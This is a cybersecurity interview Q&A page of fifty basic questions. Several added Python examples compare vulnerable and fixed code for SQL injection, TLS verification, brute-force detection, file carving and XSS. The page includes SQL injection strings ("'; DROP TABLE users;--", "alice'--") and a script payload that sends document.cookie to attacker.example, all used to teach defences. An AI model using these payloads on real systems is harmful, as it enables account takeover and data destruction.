1. What is Cyber Security?
Answer:
Cyber Security is the practice of protecting computer systems, networks, and data from cyberattacks, unauthorized access, or damage. It involves various techniques like encryption, firewalls and secure protocols to safeguard sensitive information.
For example, using HTTPS instead of HTTP secures the communication between a user and a website.
2. What are the main types of Cyber Threats?
Answer:
Cyber threats include:
- Malware: Malicious software like viruses, worms, or ransomware.
- Phishing: Fraudulent emails to steal personal information.
- DDoS (Distributed Denial of Service): Floods a server with traffic from many compromised machines at once so that it can no longer serve legitimate users.
- Man-in-the-Middle Attack: Eavesdropping on communication between two parties.
3. What is the CIA Triad in Cyber Security?
Answer:
The CIA Triad stands for:
- Confidentiality: Ensuring that data is accessed only by authorized individuals.
- Integrity: Protecting data from unauthorized modifications.
- Availability: Ensuring resources are accessible when needed.
Example: Encrypting sensitive files ensures confidentiality.
4. What is a Firewall?
Answer:
A firewall is a network security device or software that monitors and controls incoming and outgoing network traffic based on predefined security rules.
Example: A firewall can block unauthorized access to a company’s internal network while allowing employees to browse the internet safely.
5. What is Phishing?
Answer:
Phishing is a social engineering attack where attackers send deceptive emails or messages to trick users into revealing sensitive information like passwords or credit card details.
Example: Receiving an email pretending to be from your bank asking you to verify your account.
6. What is Ransomware?
Answer:
Ransomware is a type of malware that encrypts a victim’s files, making them inaccessible until a ransom is paid to the attacker.
Example: WannaCry (2017) spread on its own through an unpatched Windows SMB flaw and encrypted files on hundreds of thousands of systems worldwide.
7. What is Two-Factor Authentication (2FA)?
Answer:
Two-Factor Authentication adds an extra layer of security by requiring two forms of verification from different categories: something you know (a password) plus either something you have (a phone or hardware token that produces a one-time code) or something you are (a biometric such as a fingerprint). Two things from the same category, such as two passwords, do not count as two factors.
Example: Logging into a Gmail account with a password and a code sent to your phone.
8. What is a VPN?
Answer:
A VPN (Virtual Private Network) creates an encrypted tunnel between your device and a VPN server. Anyone on the local network or on the path to that server (for example, other users of a public Wi-Fi hotspot) sees only encrypted traffic, and websites see the VPN server's IP address instead of yours. The VPN provider itself can still see your traffic, so a VPN shifts trust to the provider rather than removing it.
Example: Using a VPN on public Wi-Fi protects your traffic from other users of that hotspot and from the hotspot operator.
9. What is Ethical Hacking?
Answer:
Ethical hacking involves breaking into computers and devices with the owner's explicit, written authorization in order to test an organization's defenses. Ethical hackers help identify vulnerabilities before malicious hackers exploit them.
Example: Penetration testing performed by certified ethical hackers.
10. What is SQL Injection?
Answer:
SQL Injection is a web application attack where attacker-controlled input is pasted into the text of a database query, so that the input is interpreted as SQL rather than as plain data.
Example: Entering '; DROP TABLE users;-- in a login form can delete a table if the application concatenates the input into its query and the database driver allows a second statement after the semicolon. The reliable defence is parameterized queries (prepared statements), which keep the query structure separate from the data; "sanitizing" input by stripping quotes is fragile.
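The vulnerable query from this answer beside its parameterized fix, as an added example that is not part of the original page. It uses Python's built-in sqlite3 module with a constructed in-memory users table (the table, the user "alice", the plaintext password and the payload are all made up for the demonstration). It also shows that this particular driver refuses the stacked DROP TABLE payload, which is why the login-bypass variant of the same flaw is what an attacker tries first.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway in-memory database with one constructed user row.
    (A real system stores a password hash, never the plaintext.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # BAD: user input is pasted into the SQL text, so the input can change
    # the structure of the query rather than just supply a value.
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # GOOD: placeholders ship the values separately from the query text;
    # a quote or comment marker inside the input is treated as plain data.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def stacked_query_allowed(conn: sqlite3.Connection) -> bool:
    """Whether this driver runs a second statement appended with ';'.
    Python's sqlite3 refuses, so the page's DROP TABLE payload fails here;
    other database drivers do allow it, so never rely on this behaviour."""
    try:
        conn.execute("SELECT 1; DROP TABLE users")
    except (sqlite3.Error, sqlite3.Warning):
        return False
    return True


# Classic authentication bypass: the quote closes the string literal and
# "--" turns the rest of the line, including the password check, into a comment.
PAYLOAD = "alice'--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable query, payload as username:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("parameterized query, same payload:   ", login_safe(db, PAYLOAD, "wrong"))
```

Run it and the first line prints True: the vulnerable function lets `alice'--` log in with no valid password, while the parameterized version treats the same string as a literal username that does not exist. Parameterization works because the query structure is fixed before any user data arrives, whatever quotes or comment markers the data contains.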
11. What is Social Engineering?
Answer:
Social engineering exploits human psychology to manipulate individuals into revealing confidential information.
Example: A fake tech support call tricking someone into sharing their system password.
12. What is a Zero-Day Exploit?
Answer:
A zero-day vulnerability is a flaw that is unknown to the vendor, who has therefore had "zero days" to fix it, so no patch exists; a zero-day exploit is code that attacks such a flaw. The name refers to the vendor's lead time, not to the calendar day on which the flaw was found.
Example: Attackers exploiting an unpatched software flaw before the vendor learns of it and releases an update.
13. What are Botnets?
Answer:
Botnets are networks of compromised devices controlled by attackers to perform coordinated tasks like sending spam or launching DDoS attacks.
Example: Mirai Botnet, which targeted IoT devices to conduct DDoS attacks.
14. What is Encryption?
Answer:
Encryption is the process of converting plaintext into ciphertext using algorithms, making it unreadable without a decryption key.
Example: AES (Advanced Encryption Standard) is commonly used to secure sensitive data.
15. What is a Denial of Service (DoS) Attack?
Answer:
A DoS attack floods a server or network with excessive requests, making it unavailable to legitimate users.
Example: An attacker sending millions of requests to crash an e-commerce site during a sale.
16. What is a Vulnerability?
Answer:
A vulnerability is a weakness in a system or application that can be exploited by attackers.
Example: Using outdated software with known security flaws.
17. What are Security Patches?
Answer:
Security patches are updates released by software vendors to fix vulnerabilities and improve security.
Example: Installing Windows updates to protect against newly discovered threats.
18. What is a Honeypot in Cyber Security?
Answer:
A honeypot is a decoy system designed to attract attackers and study their methods without risking the actual network.
Example: Setting up a fake login portal to observe brute force attacks.
19. What is the Difference Between IDS and IPS?
Answer:
- IDS (Intrusion Detection System): Monitors a copy of network traffic (or host activity) for suspicious patterns and raises alerts. It sits out of band, so it cannot stop the traffic it detects.
- IPS (Intrusion Prevention System): Sits inline on the traffic path and can drop or reset malicious connections in real time. The trade-off is that a false positive on an IPS blocks legitimate traffic, while a false positive on an IDS only costs analyst time.
20. What is SSL/TLS?
Answer:
SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security) are protocols that encrypt and authenticate data in transit, so an eavesdropper cannot read it and the client can verify that it is talking to the genuine server. All SSL versions and TLS 1.0/1.1 are deprecated; current deployments use TLS 1.2 or 1.3, although the name "SSL" persists in tools and certificate products.
Example: Websites served over HTTPS use TLS.
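An added example (not from the original page) of what "using TLS" should mean on the client side, with a small audit that flags the two mistakes most often seen in real code: turning off certificate verification and accepting obsolete protocol versions. It uses only Python's standard ssl module and opens no connection; the audit wording and function names are this example's own.

```python
import ssl
from typing import List


def make_client_context() -> ssl.SSLContext:
    """Hardened client context: verify the server certificate against the
    system trust store, check that it matches the hostname, and refuse
    anything below TLS 1.2 (SSL 2/3 and TLS 1.0/1.1 are deprecated).
    ssl.create_default_context() sets the same things; this spells them out."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.load_default_certs()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def make_weak_context() -> ssl.SSLContext:
    """The 'just make the certificate error go away' configuration seen in
    real code: it accepts any certificate, so a man-in-the-middle who
    presents his own certificate is never detected."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # must be cleared before CERT_NONE is allowed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Return a list of findings; an empty list means the context is acceptable."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate verification disabled (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        findings.append("hostname check disabled")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append(f"minimum protocol version below TLS 1.2: {ctx.minimum_version.name}")
    return findings


if __name__ == "__main__":
    print("hardened:", audit_context(make_client_context()))
    print("weak:    ", audit_context(make_weak_context()))
```

Encryption without certificate verification gives confidentiality against a passive eavesdropper only; an active attacker on the path simply terminates the TLS session himself. Grepping a code base for `CERT_NONE`, `check_hostname = False` or the equivalent `verify=False` in HTTP libraries is a quick way to find this class of bug.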
21. What is Brute Force Attack?
Answer:
A brute force attack attempts to guess passwords or encryption keys by systematically trying all possible combinations.
Example: Repeatedly trying different passwords to access an account.
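An added example, not from the original page, of the detection side of this answer and of the IDS in question 19: a sliding-window rule over constructed sshd-style log lines that flags a source IP with too many failed logins in a short time. The log lines, host name and addresses are made up (the 203.0.113.0/24 and 198.51.100.0/24 ranges are reserved for documentation); the threshold and window are arbitrary tuning parameters.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict

# Constructed sample in OpenSSH's syslog format, not a real capture.
SAMPLE_LOG = """\
Mar  1 10:00:01 host sshd[1001]: Failed password for root from 203.0.113.7 port 40001 ssh2
Mar  1 10:00:02 host sshd[1002]: Failed password for invalid user admin from 203.0.113.7 port 40002 ssh2
Mar  1 10:00:03 host sshd[1003]: Accepted publickey for deploy from 198.51.100.3 port 50000 ssh2
Mar  1 10:00:03 host sshd[1004]: Failed password for root from 203.0.113.7 port 40003 ssh2
Mar  1 10:00:04 host sshd[1005]: Failed password for root from 203.0.113.7 port 40004 ssh2
Mar  1 10:00:05 host sshd[1006]: Failed password for root from 203.0.113.7 port 40005 ssh2
Mar  1 10:00:09 host sshd[1007]: Failed password for bob from 198.51.100.3 port 50001 ssh2
Mar  1 10:10:00 host sshd[1008]: Failed password for root from 203.0.113.7 port 40006 ssh2
"""

FAILED_LOGIN = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)


def parse_syslog_time(ts: str, year: int = 2024) -> datetime:
    # syslog timestamps carry no year; the sample assumes one.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> Dict[str, str]:
    """IDS-style rule: a source IP that produces `threshold` or more failed
    logins inside any `window_s`-second sliding window is flagged. Returns
    {ip: ISO timestamp of the failure that tripped the rule}. An IPS would
    act on the same verdict, for example by dropping that IP's packets."""
    recent = defaultdict(deque)            # per-IP timestamps inside the window
    alerts: Dict[str, str] = {}
    for line in log_text.splitlines():
        m = FAILED_LOGIN.match(line)
        if not m:
            continue                        # successful logins and other noise
        ip, t = m.group("ip"), parse_syslog_time(m.group("ts"))
        q = recent[ip]
        q.append(t)
        while (t - q[0]).total_seconds() > window_s:
            q.popleft()                     # expire attempts outside the window
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = t.isoformat()
    return alerts


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT brute force from {ip} at {when}")
```

Only 203.0.113.7 trips the rule: it produces five failures in five seconds, while 198.51.100.3 has one failure and one success. A single attacker can spread guesses across many IPs or many accounts to stay under a per-IP threshold, so production rules also count per target account, and the defence that makes guessing expensive regardless of detection is a lockout or rate limit on the login endpoint plus MFA.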
22. What is Cross-Site Scripting (XSS)?
Answer:
XSS is an attack where malicious script is injected into a page served by a trusted website. Because the browser cannot tell the injected script from the site's own, it runs with the site's privileges in the victim's browser and can read session cookies, capture keystrokes, or act as the user. The root cause is untrusted input written into HTML without output encoding.
Example: Injecting a script into a comment box to steal cookies.
23. What is a Security Token?
Answer:
A security token is a hardware or software-based device that generates a unique code to verify user identity.
Example: Google Authenticator generates time-based codes.
24. What is Digital Forensics?
Answer:
Digital forensics involves investigating and recovering data from digital devices to analyze cybercrimes.
Example: Recovering deleted files from a hard drive as evidence.
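An added example (not from the original page) of the file-carving technique behind "recovering deleted files": scanning raw disk bytes for known file signatures. Deleting a file normally removes only its directory entry, so its bytes stay in unallocated space until something overwrites them. The "disk image" here is a constructed byte string containing two tiny PNG files; the carver and the PNG validator are this example's own code.

```python
import struct
import zlib
from typing import List, Tuple

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # fixed 8-byte header of every PNG
PNG_END = b"IEND"                  # type of the mandatory last chunk


def minimal_png() -> bytes:
    """Build a tiny valid 1x1 red PNG so the carver has something real to find."""
    def chunk(kind: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(kind + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter byte + one pixel
    return PNG_MAGIC + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def build_sample_image() -> bytes:
    """Constructed 'unallocated space': junk, one PNG, zeros, a second PNG, junk."""
    junk = bytes(range(256)) * 4
    return junk + minimal_png() + b"\x00" * 100 + minimal_png() + junk


def carve_png(image: bytes) -> List[Tuple[int, bytes]]:
    """Header/trailer carving: return (offset, data) for every PNG whose
    header and IEND trailer are both present. 'IEND' is followed by its
    4-byte CRC, so the file ends 8 bytes after the marker starts."""
    found = []
    pos = 0
    while True:
        start = image.find(PNG_MAGIC, pos)
        if start == -1:
            break
        end = image.find(PNG_END, start)
        if end == -1:
            break  # header without trailer: the file was partially overwritten
        end += len(PNG_END) + 4
        found.append((start, image[start:end]))
        pos = end
    return found


def png_chunks_valid(data: bytes) -> bool:
    """Walk the chunk list verifying every CRC. Carvers validate like this to
    reject false positives and truncated files before reporting them."""
    if not data.startswith(PNG_MAGIC):
        return False
    pos = len(PNG_MAGIC)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        if pos + 12 + length > len(data):
            return False               # chunk claims more bytes than remain
        kind = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(kind + body) & 0xFFFFFFFF != crc:
            return False
        pos += 12 + length
        if kind == PNG_END:
            return pos == len(data)    # IEND must be the last chunk
    return False


def recover(image: bytes) -> List[Tuple[int, bytes]]:
    """Carve, then keep only structurally valid files."""
    return [(off, data) for off, data in carve_png(image) if png_chunks_valid(data)]


if __name__ == "__main__":
    for offset, data in recover(build_sample_image()):
        print(f"valid PNG of {len(data)} bytes at offset {offset}")
```

Validating the chunk CRCs is what separates a carver from a grep: junk that happens to contain a signature, or a file that was partially overwritten, fails validation and is dropped instead of being presented as evidence. Tools such as foremost, scalpel and PhotoRec apply the same header/trailer idea across many formats and also deal with fragmented files, which this example does not. Forensic work runs such tools on a write-blocked copy of the disk so that the original evidence is never modified.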
25. What is a Cybersecurity Risk Assessment?
Answer:
A cybersecurity risk assessment identifies the organization's assets, the threats to them and the vulnerabilities those threats could exploit, then rates each risk by likelihood and impact so that mitigation effort goes to the highest risks first.
Example: Rating an internet-facing server that runs unpatched software as high likelihood and high impact, and scheduling its patching ahead of lower-rated findings.
26. What is a Trojan Horse?
Answer:
A Trojan Horse is a type of malware disguised as legitimate software to trick users into installing it. Once installed, it can perform malicious actions like stealing data or installing additional malware.
Example: A fake antivirus software that prompts users to “remove viruses” but actually infects the system.
27. What is the Difference Between Black Hat, White Hat and Grey Hat Hackers?
Answer:
- Black Hat Hackers: Malicious hackers who exploit vulnerabilities for personal or financial gain.
- White Hat Hackers: Ethical hackers who identify and fix vulnerabilities legally.
- Grey Hat Hackers: Operate between ethical and unethical practices, often without malicious intent but without permission.
28. What is Penetration Testing?
Answer:
Penetration testing (pen testing) is a simulated cyberattack performed to evaluate the security of a system. It identifies vulnerabilities before real attackers can exploit them.
Example: A company hiring ethical hackers to test its web application for flaws.
29. What is a Rootkit?
Answer:
A rootkit is a collection of tools that enable unauthorized access to a computer system while hiding its presence. It often allows attackers to execute commands or steal data without detection.
Example: A rootkit that disables antivirus software to avoid removal.
30. What is Data Breach?
Answer:
A data breach occurs when sensitive information is accessed, stolen, or leaked by unauthorized entities.
Example: The Facebook data breach in 2019 exposed millions of users’ personal data.
31. What is a Man-in-the-Middle (MITM) Attack?
Answer:
In a MITM attack, a malicious actor intercepts and alters communication between two parties without their knowledge.
Example: An attacker intercepting login credentials on public Wi-Fi.
32. What is Malware Analysis?
Answer:
Malware analysis is the process of studying malware to understand its behavior, origin, and impact. This helps in developing countermeasures.
Example: Reverse-engineering ransomware to create a decryption tool.
33. What are the Different Types of Encryption?
Answer:
- Symmetric Encryption: Uses the same key for encryption and decryption. Example: AES.
- Asymmetric Encryption: Uses a pair of keys (public and private). Example: RSA.
34. What is a Security Audit?
Answer:
A security audit is a comprehensive assessment of an organization’s security policies, procedures, and controls to ensure compliance and identify weaknesses.
Example: Regularly checking access logs and software updates.
35. What is Cyber Espionage?
Answer:
Cyber espionage is unauthorized access to sensitive or classified information, typically by state-sponsored or corporate actors seeking political, military or economic advantage rather than immediate financial gain.
Example: Hackers stealing defense secrets from a government database.
36. What are Cookies and How Can They Be Misused?
Answer:
Cookies are small pieces of data that a website stores in the browser to keep track of sessions and preferences. Because the session cookie is what proves a user is logged in, anyone who obtains it can act as that user without knowing the password, which is why attackers try to steal it.
Example: Stealing session cookies via XSS to access user accounts.
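An added example, not code from the original page, combining the comment-box XSS of question 22 with the cookie theft in this answer: the vulnerable rendering beside its output-encoded fix, and the Set-Cookie attributes that keep an injected script from reading the session id in the first place. The page template, the payload, the attacker host name and the cookie name are constructed for the demonstration.

```python
import html
from typing import List

# Constructed attacker comment: a stored-XSS payload that exfiltrates cookies.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

PAGE = '<html><body><h1>Comments</h1><p class="comment">{body}</p></body></html>'


def render_vulnerable(comment: str) -> str:
    # BAD: untrusted text is interpolated into HTML verbatim; the browser runs it.
    return PAGE.format(body=comment)


def render_safe(comment: str) -> str:
    # GOOD: HTML-encode at the output sink, so < > & " ' become inert entities.
    return PAGE.format(body=html.escape(comment, quote=True))


def contains_script(rendered: str) -> bool:
    """Crude check for the demo: does a live <script> tag survive rendering?"""
    return "<script" in rendered.lower()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for a session id. HttpOnly keeps document.cookie from
    exposing it to injected script; Secure restricts it to HTTPS; SameSite=Lax
    stops the browser from attaching it to most cross-site requests."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax; Max-Age=3600"


def cookie_findings(set_cookie: str) -> List[str]:
    """Report the hardening attributes missing from a Set-Cookie header value."""
    attrs = {part.strip().split("=")[0].lower() for part in set_cookie.split(";")[1:]}
    return [a for a in ("httponly", "secure", "samesite") if a not in attrs]


if __name__ == "__main__":
    print("vulnerable page runs script:", contains_script(render_vulnerable(PAYLOAD)))
    print("escaped page runs script:   ", contains_script(render_safe(PAYLOAD)))
    print("missing on hardened cookie: ", cookie_findings(session_cookie_header("abc123")))
    print("missing on bare cookie:     ", cookie_findings("session=abc123; Path=/"))
```

html.escape is the right encoding for text placed in an element body; text placed in an attribute, a script block or a URL needs the encoding for that context, which is why templating engines escape per context by default. HttpOnly does not stop XSS, it only takes document.cookie away from the injected script; while the page is open the script can still send requests as the logged-in user, so the fix is the output encoding, and the cookie flags limit the damage.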
37. What is an Insider Threat?
Answer:
An insider threat arises when an employee, contractor, or business partner exploits access to harm the organization.
Example: A disgruntled employee leaking confidential data.
38. What is Cybersecurity Awareness Training?
Answer:
This training educates employees about recognizing cyber threats and adhering to security best practices to reduce risks.
Example: Teaching staff to identify phishing emails.
39. What is the Role of DNS in Cyber Security?
Answer:
DNS translates domain names into IP addresses. Cybersecurity tools use DNS to block malicious websites by filtering traffic.
Example: DNS filtering to prevent users from visiting phishing sites.
40. What is Social Media Phishing?
Answer:
Social media phishing uses fake accounts or messages to steal information by pretending to be a trusted entity.
Example: A fake Facebook message asking users to reset their passwords.
41. What is Patch Management?
Answer:
Patch management involves regularly updating software to fix vulnerabilities and improve security.
Example: Installing the latest version of a browser to prevent exploitation of older bugs.
42. What is a Security Incident?
Answer:
A security incident is any event that compromises the confidentiality, integrity, or availability of information.
Example: Unauthorized access to a server.
43. What is BYOD Security?
Answer:
BYOD (Bring Your Own Device) security refers to protecting organizational data accessed on employees’ personal devices.
Example: Implementing mobile device management (MDM) policies.
44. What is the Difference Between Worms and Viruses?
Answer:
- Worms: Self-replicating malware that spreads on its own, typically by exploiting a network service or weak credentials, with no user interaction.
- Viruses: Attach themselves to a host file or program and spread only when a user runs, copies or shares that host.
Example: WannaCry spread as a worm through a Windows SMB flaw from machine to machine; a file-infecting virus spreads only when the infected program is copied and run.
45. What is Cybersecurity Insurance?
Answer:
Cybersecurity insurance covers financial losses caused by cyberattacks, including data breaches and ransomware.
Example: A company recovering costs after a ransomware attack.
46. What is Keylogging?
Answer:
Keylogging is a technique where a program records keystrokes to steal sensitive information like passwords.
Example: A keylogger capturing a user’s bank login credentials.
47. What is a Logic Bomb?
Answer:
A logic bomb is malicious code triggered by specific conditions, like a date or user action.
Example: Code planted by a developer that wipes a database if that developer's account disappears from the company directory, i.e. if they are fired.
48. What is Multi-Factor Authentication (MFA)?
Answer:
MFA requires two or more verification factors from different categories (something you know, something you have, something you are) to authenticate a user; 2FA is the two-factor case. A password plus a security question is not MFA, since both are things you know.
Example: Logging into an account using a password and fingerprint scan.
49. What is Cybersecurity Framework?
Answer:
A cybersecurity framework provides structured guidelines for managing and reducing risk. Popular frameworks include the NIST Cybersecurity Framework and ISO/IEC 27001.
Example: Implementing NIST guidelines to secure a company’s infrastructure.
50. What is Cybersecurity Governance?
Answer:
Cybersecurity governance ensures an organization aligns its security strategies with business objectives through policies and procedures.
Example: Creating a data privacy policy to comply with GDPR.